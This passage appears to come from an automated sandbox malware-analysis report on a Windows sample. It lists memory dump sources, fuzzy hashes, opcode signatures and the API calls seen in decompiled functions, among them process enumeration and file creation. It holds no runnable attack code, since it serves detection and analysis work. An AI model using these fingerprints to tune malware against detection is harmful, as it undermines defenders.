                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: ConditionMask$InfoVerifyVersion_memset
                                  • String ID:
                                  • API String ID: 3299124433-0
                                  • Opcode ID: d3ef0d53f1839c9e3bf1850531eb811aee1c8a145011ea7e9c5a9df1899ed0bd
                                  • Instruction ID: a0167c8f1a74232b0136c7fe2438c6576a0bff57e9e5d0e349309cf03c2c5f55
                                  • Opcode Fuzzy Hash: d3ef0d53f1839c9e3bf1850531eb811aee1c8a145011ea7e9c5a9df1899ed0bd
                                  • Instruction Fuzzy Hash: 17415470F043ACEEEF20CB649C45BAA7B79AB55700F4041CAE54D6B282C7B55E84CF66
                                  APIs
                                  • GetModuleHandleW.KERNEL32(100189E4,?,0364C2D7,1001D1F0,00000008,0364C46B,?,?,?,1001D210,0000000C,0364C526,?), ref: 0364EBCC
                                  • __mtterm.LIBCMT ref: 0364EBD8
                                    • Part of subcall function 0364E8A3: RtlDecodePointer.NTDLL(100209BC), ref: 0364E8B4
                                    • Part of subcall function 0364E8A3: TlsFree.KERNEL32(100209C0,0364C39A,0364C380,1001D1F0,00000008,0364C46B,?,?,?,1001D210,0000000C,0364C526,?), ref: 0364E8CE
                                    • Part of subcall function 0364E8A3: _free.LIBCMT ref: 0364F6C6
                                  • TlsAlloc.KERNEL32(?,?,0364C2D7,1001D1F0,00000008,0364C46B,?,?,?,1001D210,0000000C,0364C526,?), ref: 0364EC65
                                  • __init_pointers.LIBCMT ref: 0364EC8A
                                  • __calloc_crt.LIBCMT ref: 0364ECF8
                                  • GetCurrentThreadId.KERNEL32 ref: 0364ED24
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: AllocCurrentDecodeFreeHandleModulePointerThread__calloc_crt__init_pointers__mtterm_free
                                  • String ID:
                                  • API String ID: 347030822-0
                                  • Opcode ID: 2465f0a14bcac396a0c33370bd3830e107fa2acc38513c658810efa9718ea0a3
                                  • Instruction ID: 109b283a41b81bc118a76aca59886ab6d69b2420bf21ac1480495c2e50259c3a
                                  • Opcode Fuzzy Hash: 2465f0a14bcac396a0c33370bd3830e107fa2acc38513c658810efa9718ea0a3
                                  • Instruction Fuzzy Hash: 12319039C40B30EFF711EF758D886967AA4FF95260B28466EE402D6270EB358242CF90
                                  APIs
                                  • GetModuleHandleW.KERNEL32(100189E4,?,1000C2D3,1001D1F0,00000008,1000C467,?,?,?,1001D210,0000000C,1000C522,?), ref: 1000EBC8
                                  • __mtterm.LIBCMT ref: 1000EBD4
                                    • Part of subcall function 1000E89F: RtlDecodePointer.NTDLL(100209BC), ref: 1000E8B0
                                    • Part of subcall function 1000E89F: TlsFree.KERNEL32(100209C0,1000C396,1000C37C,1001D1F0,00000008,1000C467,?,?,?,1001D210,0000000C,1000C522,?), ref: 1000E8CA
                                    • Part of subcall function 1000E89F: _free.LIBCMT ref: 1000F6C2
                                  • TlsAlloc.KERNEL32(?,?,1000C2D3,1001D1F0,00000008,1000C467,?,?,?,1001D210,0000000C,1000C522,?), ref: 1000EC61
                                  • __init_pointers.LIBCMT ref: 1000EC86
                                  • __calloc_crt.LIBCMT ref: 1000ECF4
                                  • GetCurrentThreadId.KERNEL32 ref: 1000ED20
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: AllocCurrentDecodeFreeHandleModulePointerThread__calloc_crt__init_pointers__mtterm_free
                                  • String ID:
                                  • API String ID: 347030822-0
                                  • Opcode ID: 2465f0a14bcac396a0c33370bd3830e107fa2acc38513c658810efa9718ea0a3
                                  • Instruction ID: bb4694bb5c9a658c6d9950f541a17c18304243beb40d45fd1c97dd1bb193a613
                                  • Opcode Fuzzy Hash: 2465f0a14bcac396a0c33370bd3830e107fa2acc38513c658810efa9718ea0a3
                                  • Instruction Fuzzy Hash: 5A31C239C41A74EFF751DF748C8468A3EA4EF953A0B20466EE402E21B4DB34CA42CF40
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00405539
                                    • Part of subcall function 0065BDA1: std::exception::exception.LIBCMT ref: 0065BDB6
                                    • Part of subcall function 0065BDA1: __CxxThrowException@8.LIBCMT ref: 0065BDCB
                                    • Part of subcall function 0065BDA1: std::exception::exception.LIBCMT ref: 0065BDDC
                                  • std::_Xinvalid_argument.LIBCPMT ref: 0040555A
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00405578
                                  • _memmove.LIBCMT ref: 004055EF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                  • String ID: invalid string position$string too long
                                  • API String ID: 443534600-4289949731
                                  • Opcode ID: 66606227c3be837befd3c4275abdea4d1c8e0940e776b2db282814a0a66f2dcd
                                  • Instruction ID: 82526b9a656a89521d1cc6155e20f064ad69c051c4c73cc3db6df7d088c1ea27
                                  • Opcode Fuzzy Hash: 66606227c3be837befd3c4275abdea4d1c8e0940e776b2db282814a0a66f2dcd
                                  • Instruction Fuzzy Hash: FD31B4327047149BC724DF68E88082BB3B7EFD57207104A3FE556DB294DB74D9448BA8
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00401D49
                                    • Part of subcall function 0065BDA1: std::exception::exception.LIBCMT ref: 0065BDB6
                                    • Part of subcall function 0065BDA1: __CxxThrowException@8.LIBCMT ref: 0065BDCB
                                    • Part of subcall function 0065BDA1: std::exception::exception.LIBCMT ref: 0065BDDC
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00401D6A
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00401D85
                                  • _memmove.LIBCMT ref: 00401DED
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                  • String ID: invalid string position$string too long
                                  • API String ID: 443534600-4289949731
                                  • Opcode ID: fb006089ef734ae445a4013f076dbe047356ea60279261c151c10134b43e82eb
                                  • Instruction ID: 5e384d3fcd57fe90cd880de6c387c4710e0ccccbc07b491ad084651309c3f517
                                  • Opcode Fuzzy Hash: fb006089ef734ae445a4013f076dbe047356ea60279261c151c10134b43e82eb
                                  • Instruction Fuzzy Hash: EE3186323042148BD724DE5CE980A6AF3EAEF91765F100A3FF552DB2E1D774E8408799
                                  APIs
                                  • __EH_prolog3_GS.LIBCMT ref: 0364A071
                                  • wsprintfA.USER32 ref: 0364A100
                                  • wsprintfA.USER32 ref: 0364A423
                                    • Part of subcall function 03648B95: __fassign.LIBCMT ref: 03648BA8
                                  • _wprintf.LIBCMT ref: 0364A19F
                                  • std::_Xinvalid_argument.LIBCPMT ref: 0364A3FF
                                  • OutputDebugStringA.KERNEL32(?,?,?,?,?,?,10017380,000000FF), ref: 0364A439
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: wsprintf$DebugH_prolog3_OutputStringXinvalid_argument__fassign_wprintfstd::_
                                  • String ID:
                                  • API String ID: 2279894289-0
                                  • Opcode ID: 3497b7195cda61148555650dbdf71ca7da6f6a0dc9df4403e6f0026ca4a87f2b
                                  • Instruction ID: 0fced711790dc5586edcc8c27de407ee41fadf450ba5f9b9fba98cbffabaf4d0
                                  • Opcode Fuzzy Hash: 3497b7195cda61148555650dbdf71ca7da6f6a0dc9df4403e6f0026ca4a87f2b
                                  • Instruction Fuzzy Hash: 18C15C35C4426CAFCF22DFA4CD80ADDBBB9AF05300F5484A9E949AB240E7709B85CF55
                                  APIs
                                  • GlobalAlloc.KERNEL32(00000002,?,?,?,?,?,005A0DB6,00000000,00000000,?,?,005A2BCA,?,?,?,00000084), ref: 005A0C7D
                                  • GlobalLock.KERNEL32(00000000,?,005A0DB6,00000000,00000000,?,?,005A2BCA,?,?,?,00000084,005A2F9E,0000000A,0000000A,0000000A), ref: 005A0C95
                                  • _memmove.LIBCMT ref: 005A0CA2
                                  • CreateStreamOnHGlobal.OLE32(00000000,00000000,00000000,?), ref: 005A0CB1
                                  • EnterCriticalSection.KERNEL32(0073BF7C,00000000), ref: 005A0CCA
                                  • LeaveCriticalSection.KERNEL32(0073BF7C,00000000), ref: 005A0D31
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Global$CriticalSection$AllocCreateEnterLeaveLockStream_memmove
                                  • String ID:
                                  • API String ID: 861836607-0
                                  • Opcode ID: 526725fd6f2a54b5203aea163b927db4e9eab3c19d260a16980050694004d8d4
                                  • Instruction ID: 723b10142501e81c227946937d3e171a4ef0492989f4ccc9acfb5ee6c1725a21
                                  • Opcode Fuzzy Hash: 526725fd6f2a54b5203aea163b927db4e9eab3c19d260a16980050694004d8d4
                                  • Instruction Fuzzy Hash: 3B21F375A1020ABBDB10ABB0DC59B6E7FA9FF08365F106215F901D6291EB34DD40CB65
                                  APIs
                                  • GetWindowLongW.USER32(?,000000F0), ref: 005394E2
                                  • GetParent.USER32(?), ref: 005394F0
                                  • GetParent.USER32(?), ref: 00539503
                                  • GetLastActivePopup.USER32(?), ref: 00539514
                                  • IsWindowEnabled.USER32(?), ref: 00539528
                                  • EnableWindow.USER32(?,00000000), ref: 0053953B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                  • String ID:
                                  • API String ID: 670545878-0
                                  • Opcode ID: f85e988b6dd063a92da9731562eb5832517575daa5fac298cc417a5ad7b44e7a
                                  • Instruction ID: caad1110258afdafcf25bd2fee8b6b0ca5e4a1e11ecf7ab5e2b21a18e9d2185a
                                  • Opcode Fuzzy Hash: f85e988b6dd063a92da9731562eb5832517575daa5fac298cc417a5ad7b44e7a
                                  • Instruction Fuzzy Hash: D611A3F260222267DF721A699C84B6B6F9D7F95B60F150210EC05E7255EBF0CD4187E1
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03641825
                                  • _memset.LIBCMT ref: 0364183A
                                  • Process32FirstW.KERNEL32(00000000,?), ref: 03641854
                                  • lstrcmpiW.KERNEL32(?,?), ref: 03641869
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0364187B
                                  • CloseHandle.KERNEL32(00000000), ref: 0364188E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memsetlstrcmpi
                                  • String ID:
                                  • API String ID: 2129496168-0
                                  • Opcode ID: c5a9032939595190b898ad5427888ca66ad21a98790668b7f26350e3c35d2074
                                  • Instruction ID: 6a15660728548d63d951fe20ae62d1e46475af5ff98d084b5c06264a34f004d8
                                  • Opcode Fuzzy Hash: c5a9032939595190b898ad5427888ca66ad21a98790668b7f26350e3c35d2074
                                  • Instruction Fuzzy Hash: CB110971A0121CAFEB50EFA4DDC8AAAB7BCBB09644F0440A9E605D6150DB78DF49CF60
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10001821
                                  • _memset.LIBCMT ref: 10001836
                                  • Process32FirstW.KERNEL32(00000000,?), ref: 10001850
                                  • lstrcmpiW.KERNEL32(?,?), ref: 10001865
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 10001877
                                  • CloseHandle.KERNEL32(00000000), ref: 1000188A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memsetlstrcmpi
                                  • String ID:
                                  • API String ID: 2129496168-0
                                  • Opcode ID: c5a9032939595190b898ad5427888ca66ad21a98790668b7f26350e3c35d2074
                                  • Instruction ID: 48be9d534c6f7ae1162ece858ad7ff7c85b295601d6015b5433e981284ae0b0a
                                  • Opcode Fuzzy Hash: c5a9032939595190b898ad5427888ca66ad21a98790668b7f26350e3c35d2074
                                  • Instruction Fuzzy Hash: 7811F771A0021CABEB50DBA5DCC9AAEB7BCFB08684F1041A9E505D2150DB78EF48CB60
                                  APIs
                                  • __getptd.LIBCMT ref: 0064D854
                                    • Part of subcall function 00645CA8: __getptd_noexit.LIBCMT ref: 00645CAB
                                    • Part of subcall function 00645CA8: __amsg_exit.LIBCMT ref: 00645CB8
                                  • __amsg_exit.LIBCMT ref: 0064D874
                                  • __lock.LIBCMT ref: 0064D884
                                  • InterlockedDecrement.KERNEL32(?), ref: 0064D8A1
                                  • _free.LIBCMT ref: 0064D8B4
                                  • InterlockedIncrement.KERNEL32(02882D00), ref: 0064D8CC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                  • String ID:
                                  • API String ID: 3470314060-0
                                  • Opcode ID: aca81ef20a275feb592d8cffede4921b8c8635df1298b82f26911984056ae1aa
                                  • Instruction ID: 0b45c1a15772a907cefcd076acac7bbd7ed1c52a3a15516d6d346479437fd9bc
                                  • Opcode Fuzzy Hash: aca81ef20a275feb592d8cffede4921b8c8635df1298b82f26911984056ae1aa
                                  • Instruction Fuzzy Hash: F0018031D00721AFEB65AB6598457AD7762BF00722F05501DF801AB2D1CB78AE81CBDA
                                  APIs
                                  • __getptd.LIBCMT ref: 0364E06F
                                    • Part of subcall function 0364EA0D: __getptd_noexit.LIBCMT ref: 0364EA10
                                    • Part of subcall function 0364EA0D: __amsg_exit.LIBCMT ref: 0364EA1D
                                  • __amsg_exit.LIBCMT ref: 0364E08F
                                  • __lock.LIBCMT ref: 0364E09F
                                  • InterlockedDecrement.KERNEL32(?), ref: 0364E0BC
                                  • _free.LIBCMT ref: 0364E0CF
                                  • InterlockedIncrement.KERNEL32(10020670), ref: 0364E0E7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609372866.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3640000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                  • String ID:
                                  • API String ID: 3470314060-0
                                  • Opcode ID: 6b734a3c0f387b71fdf5a8eab89ac20fe8d4012c3391868757373a917024e17b
                                  • Instruction ID: d5953b0de6798e55a3c150653a282bfedc9535829701edd26541ab94e50706c2
                                  • Opcode Fuzzy Hash: 6b734a3c0f387b71fdf5a8eab89ac20fe8d4012c3391868757373a917024e17b
                                  • Instruction Fuzzy Hash: CA018439D00721EBE761EF749A8C75DB761BB04B20F184159E8206B790CB35D562CFE5
                                  APIs
                                  • __getptd.LIBCMT ref: 1000E06B
                                    • Part of subcall function 1000EA09: __getptd_noexit.LIBCMT ref: 1000EA0C
                                    • Part of subcall function 1000EA09: __amsg_exit.LIBCMT ref: 1000EA19
                                  • __amsg_exit.LIBCMT ref: 1000E08B
                                  • __lock.LIBCMT ref: 1000E09B
                                  • InterlockedDecrement.KERNEL32(?), ref: 1000E0B8
                                  • _free.LIBCMT ref: 1000E0CB
                                  • InterlockedIncrement.KERNEL32(10020670), ref: 1000E0E3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2609581253.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10001000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                  • String ID:
                                  • API String ID: 3470314060-0
                                  • Opcode ID: e503b38899fc1a29c20fb0dfb269530488a74d22e43012d9d9e3d18c058fb6d0
                                  • Instruction ID: 44ac7dee67aa228faf62a7f712449706e970d0ab81b91fd94cc9ca9f82e1b276
                                  • Opcode Fuzzy Hash: e503b38899fc1a29c20fb0dfb269530488a74d22e43012d9d9e3d18c058fb6d0
                                  • Instruction Fuzzy Hash: 9E01ED359017A2EBFB50DF64888575EB7A0FB403D0F114109F80073A9ACBB4ADC2CB91
                                  APIs
                                    • Part of subcall function 0040E1B0: _memcpy_s.LIBCMT ref: 0040E1FE
                                    • Part of subcall function 00406F50: GetPrivateProfileStringW.KERNEL32(?,?,006FD638,?,00000104,?), ref: 00407008
                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,00000000,00000000), ref: 00409C2F
                                  • CloseHandle.KERNEL32(00000000), ref: 00409C3B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: CloseCreateFileHandlePrivateProfileString_memcpy_s
                                  • String ID: 5$Append$AppendConfig
                                  • API String ID: 79106774-350907740
                                  • Opcode ID: 2e6965b5df3f8dfad31b6edf045d025977a6940ae358be02456ca76c035c7470
                                  • Instruction ID: 06c66d2126c4b2e9dbee7dd30553911df190c32867d4856d531fbafd0fa60377
                                  • Opcode Fuzzy Hash: 2e6965b5df3f8dfad31b6edf045d025977a6940ae358be02456ca76c035c7470
                                  • Instruction Fuzzy Hash: F9919D70A01A419FD704CBACCC45B59B7B5BF86334B288399E0259B3E6DB35AD06CB54
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$_memmove
                                  • String ID: .log$string too long
                                  • API String ID: 2168136238-1238634221
                                  • Opcode ID: 3e742d8286ec06c4de4ca1d32461e9233f1f9db3feed9340cb34e9c00e48ac34
                                  • Instruction ID: ba63fa9c0fdd71f83f8827a9d30a3fd893f18fd041617f137f78797f6e50b4b2
                                  • Opcode Fuzzy Hash: 3e742d8286ec06c4de4ca1d32461e9233f1f9db3feed9340cb34e9c00e48ac34
                                  • Instruction Fuzzy Hash: A031C672304A048BC724CE68D99083BB3EAFFA57107600A3FE546976D0DB769D448FAD
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00404C2A
                                    • Part of subcall function 0065BDA1: std::exception::exception.LIBCMT ref: 0065BDB6
                                    • Part of subcall function 0065BDA1: __CxxThrowException@8.LIBCMT ref: 0065BDCB
                                    • Part of subcall function 0065BDA1: std::exception::exception.LIBCMT ref: 0065BDDC
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00404C6A
                                    • Part of subcall function 0065BD54: std::exception::exception.LIBCMT ref: 0065BD69
                                    • Part of subcall function 0065BD54: __CxxThrowException@8.LIBCMT ref: 0065BD7E
                                    • Part of subcall function 0065BD54: std::exception::exception.LIBCMT ref: 0065BD8F
                                  • _memmove.LIBCMT ref: 00404CD6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2607518247.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2607494184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607770311.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607852468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607881728.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607918058.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607945972.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2607972734.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_pXm5oVO3Go.jbxd
                                  Similarity
                                  • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
                                  • String ID: invalid string position$string too long
                                  • API String ID: 1615890066-4289949731
                                  • Opcode ID: 8cf94c5e2ab0962ed1a99ecdfa077e95bb3b89be6ee8aaed87cfbdd882414eea
                                  • Instruction ID: 09d298bdaee62a18382292498f2c0fcfb31ea0c3e6b8f72883f7026a4db5369d
                                  • Opcode Fuzzy Hash: 8cf94c5e2ab0962ed1a99ecdfa077e95bb3b89be6ee8aaed87cfbdd882414eea
                                  • Instruction Fuzzy Hash: 373107733092149BD710DE5CE88092FF3AAEFE5725722463FF601DB290DA759C0187A8
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00401E3A
                                    • Part of subcall function 0065BDA1: std::exception::exception.LIBCMT ref: 0065BDB6
                                    • Part of subcall function 0065BDA1: __CxxThrowException@8.LIBCMT ref: 0065BDCB
                                    • Part of subcall function 0065BDA1: std::exception::exception.LIBCMT ref: 0065BDDC
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00401E77
                                    • Part of subcall function 0065BD54: std::exception::exception.LIBCMT ref: 0065BD69
                                    • Part of subcall function 0065BD54: __CxxThrowException@8.LIBCMT ref: 0065BD7E
                                    • Part of subcall function 0065BD54: std::exception::exception.LIBCMT ref: 0065BD8F
                                  • _memmove.LIBCMT ref: 00401ED8
                                  Strings
                                  Memory Dump Source
